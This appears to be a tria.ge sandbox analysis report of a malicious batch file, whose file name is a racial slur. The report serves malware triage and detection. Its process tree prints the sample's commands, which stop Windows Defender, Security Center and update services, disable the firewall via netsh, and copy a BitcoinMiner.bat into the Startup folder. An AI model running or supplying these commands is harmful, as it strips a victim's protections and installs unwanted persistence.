Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    124s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 06:18

General

  • Target

    nigger.bat

  • Size

    22KB

  • MD5

    9728d8cbe0f70e03fd89949af0e83ec9

  • SHA1

    29156b3c59987aea93a444a7bc3e910d58cce381

  • SHA256

    a0a59c0434f9f36915f4b00704f1270878412dd6f63639956616faed8d3417be

  • SHA512

    6637bf029dfdeb38d225db1b60e28d2d351f70e609e6049274a88d95cb4c2f6067c855c63fc5faeff20610025327d4b3c840379be43df05c1de888d2b9696137

  • SSDEEP

    192:P9+NMQsAG26lW9AU4c8gbDkMtzHkb4+6OFJIkRpGV9+NMQsAG26lW9AU4c8gbDkm:P9+mlk9+mlw

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 2 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nigger.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3344
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:544
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4928
      • C:\Windows\system32\net.exe
        net stop "SDRSVC"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC"
          3⤵
            PID:4992
        • C:\Windows\system32\net.exe
          net stop "WinDefend"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:932
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "WinDefend"
            3⤵
              PID:3160
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im "MSASCui.exe"
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2412
          • C:\Windows\system32\net.exe
            net stop "security center"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4188
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "security center"
              3⤵
                PID:4376
            • C:\Windows\system32\net.exe
              net stop sharedaccess
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3292
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop sharedaccess
                3⤵
                  PID:4660
              • C:\Windows\system32\netsh.exe
                netsh firewall set opmode mode-disable
                2⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:1556
              • C:\Windows\system32\net.exe
                net stop "wuauserv"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2012
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "wuauserv"
                  3⤵
                    PID:3012
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo tasklist "
                  2⤵
                    PID:2636
                  • C:\Windows\system32\find.exe
                    find /I "L0Lz"
                    2⤵
                      PID:2792
                    • C:\Windows\system32\xcopy.exe
                      XCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                      2⤵
                      • Drops startup file
                      PID:1184
                    • C:\Windows\system32\xcopy.exe
                      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                      2⤵
                        PID:1352
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4308,i,15436195446242760253,4000484513008731869,262144 --variations-seed-version --mojo-platform-channel-handle=3964 /prefetch:8
                      1⤵
                        PID:1960

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\BitcoinMiner.bat

                        Filesize

                        271B

                        MD5

                        e975f5739aa276ac84d20381d5864424

                        SHA1

                        e908dbd044364a9c0289c93ca9b360e5596ff310

                        SHA256

                        609a4f1965c69e4aa87b462c65f306614b403b43e145a4804833a8f9fd9d011b

                        SHA512

                        7aea28f814ebc509061c45334ee06246499219f0f4de8f960cb4b030d93de9ebfee8067630e9355065f422e8fb4c275ea499337073fa513f8d092e96f51d2dcf